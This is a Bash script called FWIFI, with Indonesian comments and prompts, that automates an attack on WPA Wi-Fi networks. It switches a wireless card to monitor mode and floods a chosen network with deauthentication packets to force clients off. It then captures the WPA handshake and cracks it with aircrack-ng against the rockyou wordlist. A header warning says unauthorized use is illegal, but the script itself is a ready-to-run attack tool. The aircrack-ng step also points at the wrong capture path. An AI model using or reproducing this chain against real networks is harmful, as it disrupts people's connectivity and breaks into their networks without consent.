#!/bin/bash
#---------------------------------------------------------------------------------------------------------------------------
#
# Nama script : FWIFI 
# Deskripsi script : FWIFI adalah skrip Bash yang dirancang untuk melakukan serangkaian tes penetrasi pada jaringan Wi-Fi.
# Pembuat script : rofidoang03
#
#---------------------------------------------------------------------------------------------------------------------------
#
# Github : https://github.com/rofidoang03/FWIFI
#
#---------------------------------------------------------------------------------------------------------------------------
#
# - PERINGATAN -
#
# Penggunaan alat ini pada jaringan yang tidak Anda miliki tanpa izin adalah ilegal.
# Pastikan Anda memiliki izin dari pemilik jaringan sebelum melakukan tes penetrasi.
# Penyalahgunaan alat ini dapat melanggar hukum dan privasi orang lain.
# Pengguna bertanggung jawab sepenuhnya atas tindakan yang dilakukan dengan menggunakan script ini.
#
#---------------------------------------------------------------------------------------------------------------------------


clear
if [[ $EUID -ne 0 ]]; then
    echo "Skrip ini harus dijalankan sebagai root."
    exit 1
fi
echo ""
echo "    +---------------------------------------------+    "
echo "    | _____________      __.______________.___    |    "
echo "    | \_   _____/  \    /  \   \_   _____/|   |   |    "
echo "    |  |    __) \   \/\/   /   ||    __)  |   |   |    "
echo "    |  |     \   \        /|   ||     \   |   |   |    "
echo "    |  \___  /    \__/\  / |___|\___  /   |___|   |    "
echo "    |      \/          \/           \/            |    "
echo "    |       https://github.com/rofidoang03/fwifi  |    "
echo "    +---------------------------------------------+    "
echo ""
read -p "Masukkan nama antarmuka nirkabel (contoh: wlan0): " interface
if [[ -z "$interface" ]]; then
    echo "Nama antarmuka nirkabel tidak boleh kosong."
    exit 1
fi
if ! iwconfig "$interface" >> /dev/null 2>&1; then
    echo "Antarmuka nirkabel tidak valid. Harap berikan nama antarmuka nirkabel yang valid."
    exit 1
fi
airmon-ng check kill ; airmon-ng start "$interface"
airodump-ng "$interface"
echo ""
read -p "Masukkan BSSID dari jaringan target: " bssid
if [[ -z "$bssid" ]]; then
    echo "BSSID tidak boleh kosong."
    exit 1
fi
if ! [[ $bssid =~ ^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$ ]]; then
    echo "Format BSSID tidak valid. Harap masukkan BSSID dalam format XX:XX:XX:XX:XX:XX."
    exit 1
fi
read -p "Masukkan nomor Channel: " channel
if [[ -z "$channel" ]]; then
    echo "Channel tidak boleh kosong."
    exit 1
fi
if ! [[ "$channel" =~ ^[0-9]+$ ]]; then
    echo "Channel tidak valid. Harap masukkan nomor Channel yang valid."
    exit 1
fi
iwconfig "$interface" channel "$channel"
timestamp=$(date +"%Y-%m-%d_%H:%M:%S")
output_file="${bssid}_${timestamp}"
xterm -e "aireplay-ng -0 0 -a $bssid $interface" & sleep 1 && xterm -e "airodump-ng --bssid $bssid -c $channel -w file_pcap/$output_file $interface"
file_pcap="file_pcap/$output_file-01.cap"
handshakes=$(tshark -r "$file_pcap" -Y "eapol" -T fields -e wlan.bssid -e wlan.da -e wlan.sa -e eapol.keydes.type -E occurrence=f | wc -l)
if [[ $handshakes -gt 0 ]]; then
    aircrack-ng -w "wordlists/rockyou.txt" "$output_file-01.cap"
    echo ""
    echo "Terimakasih telah menggunakan script sederhana kami :)"
    echo ""
    exit 0
else
    echo ""
    echo "File '$file_pcap' tidak memiliki cukup handshake untuk dapat dicrack dengan aircrack-ng."
    exit 1
fi
